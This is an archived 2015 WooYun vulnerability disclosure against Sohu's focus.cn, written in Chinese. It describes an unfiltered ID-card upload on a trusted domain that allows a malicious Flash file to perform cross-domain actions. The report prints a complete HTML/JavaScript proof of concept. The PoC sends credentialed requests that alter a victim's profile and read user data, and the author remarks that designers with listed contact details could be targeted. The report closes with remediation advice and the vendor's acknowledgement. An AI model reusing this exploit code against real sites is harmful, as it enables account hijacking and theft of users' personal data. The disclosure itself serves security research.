乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-26: 细节已通知厂商并且等待厂商处理中 2015-05-31: 厂商已经确认,细节仅向厂商公开 2015-06-10: 细节向核心白帽子及相关领域专家公开 2015-06-20: 细节向普通白帽子公开 2015-06-30: 细节向实习白帽子公开 2015-07-15: 细节向公众公开
摩擦摩擦,求不小厂商。
http://mp.sohu.com/web/personal/get //上传身份证处未过滤,且文件上传到了itc信任域下查看源码得到flash链接:
http://sucimg.itc.cn/avatarimg/b9242b2cbe19450a9347accbc8dcc639_1432645407636
接下来构造POC进行操作,这里用修改资料证明:(图中cookie已删除)
得到请求包为:
http://pinge.focus.cn/a/edituserinfouid=84102935&province=1011&city=1011001&nickname=Jearyhack&realname=&contact=&visible=0&gender=1&description=hack&company=&cases=&isdesigner=2
POC:
<html><head><title>csrftest</title><script>function Connection(Sendtype,url,content,callback){ if (window.XMLHttpRequest){ var xmlhttp=new XMLHttpRequest(); } else{ var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function(){ if(xmlhttp.readyState==4&&xmlhttp.status==200) { callback(xmlhttp.responseText); } } xmlhttp.open(Sendtype,url,true); xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlhttp.withCredentials = "true"; xmlhttp.send(content);} function sendToJavaScript(strData){ var theDiv = document.getElementById("HijackedData"); var content = document.createTextNode(strData); theDiv.appendChild(content); theDiv.innerHTML += '<br/>' var posturl = "http://pinge.focus.cn//a/edituserinfo "; var postdata= "uid=84102935&province=1011&city=1011001&nickname=Jearyhack&realname=&contact=&visible=0&gender=1&description=hack&company=&cases=&isdesigner=2"; Connection("POST",posturl,postdata,function(callback){}); }</script></head><body><div id=HijackedData></div><object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" data="http://sucimg.itc.cn/avatarimg/b9242b2cbe19450a9347accbc8dcc639_1432645407636"><param name="AllowScriptAccess" value="always"><param name="flashvars" value="input=http://pinge.focus.cn/u/attention"></object></body></html>
设计师挺多了,大部分设计师都有联系方式哦,可指定目标进行劫持
用flash跨域理论上是可以模拟出用户的任何操作的,即使是在某些有token的情况下
1.涉及用户操作的请勿在crossdomain里配置*2.上传文件到信任域时验证文件内容
危害等级:高
漏洞Rank:10
确认时间:2015-05-31 00:09
感谢支持。
暂无